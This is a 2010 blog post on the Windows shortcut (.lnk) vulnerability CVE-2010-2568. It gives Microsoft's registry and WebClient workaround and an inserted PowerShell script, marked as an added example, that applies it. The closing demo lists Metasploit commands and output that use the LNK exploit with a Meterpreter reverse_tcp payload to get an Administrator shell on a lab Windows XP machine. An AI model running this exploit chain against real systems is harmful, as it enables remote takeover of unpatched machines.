Windows “Shortcuts to Pawnage”

On 16th July, 2010 researchers found a new shortcut to pawn remote systems in an unusual way: they crafted a way to exploit Windows shortcut files, commonly referred to as .lnk files, in order to gain unauthorized access to a remote computer.

Users need not even click the shortcut file; if they merely view it in Explorer, that’s it… Game over!! Interesting, right?

Let’s dig deeper to find the exact cause of this shortcut to pawnage ;)

Vulnerability:

There exists an unpatched vulnerability (CVE-2010-2568) in the parser code for Windows .lnk files (aka shortcuts) and .pif files. Windows automatically executes the malicious code when a specially crafted .lnk/.pif file is read by Windows Explorer or any other similar application that displays icons for shortcuts. This vulnerability can be exploited locally from USB drives, over a network share, or even from remote WebDAV locations.

As this vulnerability is not related to buffer overflows or memory corruption, ASLR and Protected Mode will not help in avoiding exploitation. All versions of Windows are affected by this vulnerability.

Exploitation:

According to AV vendor VirusBlokAda, this vulnerability is already being exploited in the wild; they have seen fully patched Windows 7 machines getting infected by a worm exploiting it. See the references for the complete document on the worm analysis.

After successful exploitation of the vulnerability, the worm sends the message “SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!” to the Windows debugger.

Metasploit has also just released an exploit module for this attack, which uses a WebDAV location as the attack vector. We will have a complete demonstration of this exploit in the pawnage section.

Workarounds/Mitigation:

Microsoft is asking end users to apply the following registry workaround to stop icons from being displayed by the Windows shell. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

  • Open RegEdit
  • Locate HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
  • Change the (default) value from {00021401-0000-0000-C000-000000000046} to “”
  • Locate HKEY_CLASSES_ROOT\piffile\shellex\IconHandler
  • Change the (default) value from {00021401-0000-0000-C000-000000000046} to “”
  • Close RegEdit
  • Restart explorer.exe or reboot Windows

Disabling the WebClient service will also help protect systems from attacks using the WebDAV attack vector.
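The registry and service workaround above, scripted so it can be applied, verified and reverted on many machines. This is an added example, not code from the original post or from Microsoft; it assumes an elevated PowerShell session (Windows PowerShell 2.0 or later, since it uses Get-WmiObject for the service start mode), and the backup file path is my own choice.

```powershell
# Added example: apply/verify/revert the CVE-2010-2568 workaround described in the post.
# Assumes an elevated (Administrator) PowerShell session. The backup path is an
# arbitrary choice for this example, not anything Microsoft or the post specifies.

$IconHandlerKeys = @(
    'Registry::HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler',
    'Registry::HKEY_CLASSES_ROOT\piffile\shellex\IconHandler'
)
$BackupFile = Join-Path $env:ProgramData 'iconhandler-backup.json'   # assumed location

function Get-IconHandlerState {
    # Returns the (default) value of each IconHandler key; $null if the key is absent.
    $state = @{}
    foreach ($key in $IconHandlerKeys) {
        $item = Get-ItemProperty -Path $key -Name '(default)' -ErrorAction SilentlyContinue
        $state[$key] = if ($item) { $item.'(default)' } else { $null }
    }
    return $state
}

function Disable-ShortcutIcons {
    # Save the original CLSIDs first so the change can be reverted once a patch is installed,
    # then blank the handlers, which is the registry step listed above.
    Get-IconHandlerState | ConvertTo-Json | Set-Content -Path $BackupFile
    foreach ($key in $IconHandlerKeys) {
        Set-ItemProperty -Path $key -Name '(default)' -Value ''
    }
}

function Restore-ShortcutIcons {
    # Put the saved CLSIDs back (only meaningful after Disable-ShortcutIcons has run).
    $saved = Get-Content -Path $BackupFile -Raw | ConvertFrom-Json
    foreach ($key in $IconHandlerKeys) {
        $value = $saved.$key
        if (-not [string]::IsNullOrEmpty($value)) {
            Set-ItemProperty -Path $key -Name '(default)' -Value $value
        }
    }
}

function Disable-WebClientService {
    # WebClient is the WebDAV redirector; stopping and disabling it removes the remote
    # WebDAV share vector used in the demo below.
    Stop-Service -Name WebClient -Force -ErrorAction SilentlyContinue
    Set-Service -Name WebClient -StartupType Disabled
}

function Restart-Explorer {
    # The shell caches the icon handler, so it must be restarted for the change to apply.
    Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue
    Start-Process explorer.exe
}

function Test-Workaround {
    # Reports whether both mitigations are in place on this machine.
    $state = Get-IconHandlerState
    $iconsBlanked = $true
    foreach ($value in $state.Values) {
        if (-not [string]::IsNullOrEmpty($value)) { $iconsBlanked = $false }
    }
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='WebClient'"
    $webdavOff = ($null -eq $svc) -or ($svc.StartMode -eq 'Disabled')
    [pscustomobject]@{
        IconHandlersBlanked = $iconsBlanked
        WebClientDisabled   = $webdavOff
    }
}

# Apply both mitigations, restart the shell, and print the resulting state.
Disable-ShortcutIcons
Disable-WebClientService
Restart-Explorer
Test-Workaround
```

Run Test-Workaround on its own to audit a machine without changing it, and Restore-ShortcutIcons to bring icons back once the vendor patch is installed. Blanking the handler does not change what a crafted shortcut contains; it only stops the shell from invoking the vulnerable icon code, so treat it as a stopgap rather than a fix.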

Pawnage demo:

Let’s look at this demo of pawning a Windows XP box using Metasploit. In this demo, Metasploit redirects victims, via WebDAV requests, to a malicious Windows share containing a specially crafted .lnk file and a malicious .dll file that carries the actual payload.

As soon as this Windows share on the attacker’s box is read by the victim’s shell (Windows Explorer in our case), the specially crafted .lnk file causes the payload .dll to be loaded into the address space of the victim’s explorer process, which runs the payload and hands us a shell.

Following are the steps followed by an attacker to exploit this vulnerability.

msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:73:7b:ff
          inet addr:192.168.146.128  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe73:7bff/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:502 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:50019 (50.0 KB)  TX bytes:5554 (5.5 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:16 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:960 (960.0 B)  TX bytes:960 (960.0 B)

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.146.128
LHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.146.128  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.146.128
SRVHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.146.128:4444
[*]
[*] Send vulnerable clients to \\192.168.146.128\ncSTz\
[*]
[*] Using URL: http://192.168.146.128:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/desktop.ini
[*] Sending 404 for /ncSTz/desktop.ini ...
[*] Sending LNK file to 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.manifest ...
[*] Sending DLL payload 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.123.Manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.146.129
[*] Meterpreter session 1 opened (192.168.146.128:4444 -> 192.168.146.129:1039) at Wed Jul 21 00:11:19 +0530 2010

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l

Active sessions
===============

  Id  Type         Information                                      Connection
  --  ----         -----------                                      ----------
  1   meterpreter  VICTIM-AJG5DLK5\Administrator @ VICTIM-AJG5DLK5  192.168.146.128:4444 -> 192.168.146.129:1039

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-AJG5DLK5
OS      : Windows XP (Build 2600, ).
Arch    : x86
Language: en_US

GAME OVER!!!

Following is the video demonstration of the above attack using Metasploit.


References:


5 Responses to “Windows “Shortcuts to Pawnage””

  1. Roger Says:

    When is the video coming?

  2. Abhijeet Says:

    Just posted!!!
    Enjoy :)

  3. Ajeet Says:

    Video is good. Thanks for sharing.

  4. El Pato Says:

    Not bad, but nowhere near as 31337 as this rockstar! http://www.youtube.com/watch?v=SXmv8quf_xM&feature=player_embedded

  5. Abhijeet Says:

    Very amusing :)


This entry was posted on Wednesday, July 21st, 2010 at 12:25 pm and is filed under Exploitation, HOWTO's, Information Security, Vulnerability.
